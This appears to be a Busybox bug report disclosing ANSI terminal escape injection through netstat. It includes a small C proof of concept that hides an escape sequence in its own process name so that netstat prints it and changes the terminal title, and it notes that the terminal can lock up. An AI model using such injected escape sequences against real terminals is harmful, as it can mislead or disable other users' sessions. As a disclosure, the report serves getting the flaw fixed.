| Summary: | ANSI terminal injection possible in netstat | ||
|---|---|---|---|
| Product: | Busybox | Reporter: | Ricardo Branco <rbranco> |
| Component: | Networking | Assignee: | unassigned |
| Status: | NEW --- | ||
| Severity: | normal | CC: | busybox-cvs |
| Priority: | P5 | ||
| Version: | unspecified | ||
| Target Milestone: | --- | ||
| Hardware: | All | ||
| OS: | Linux | ||
| Host: | Target: | ||
| Build: | |||
The following code displays a X as the title of an ANSI terminal. Without the final '\007' the terminal can be locked up. I think the project in general would benefit from an audit of every line using /proc/*/cmdline, /proc/*/comm, /proc/*/environ and even the symlinks /proc/*/exe & cwd. $ cat > a.c << EOF #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <arpa/inet.h> #include <err.h> int main(int argc, char *argv[]) { struct sockaddr_in sin; int s; if ((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0) err(1, "socket()"); memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_addr.s_addr = INADDR_ANY; if (bind(s, (struct sockaddr*)&sin, sizeof(sin)) < 0) err(1, "bind()"); strcpy(argv[0], "/\033]0;X\007"); while (1) sleep(3600); } EOF $ unset PROMPT_COMMAND $ cc a.c $ ./a.out & $ netstat -aup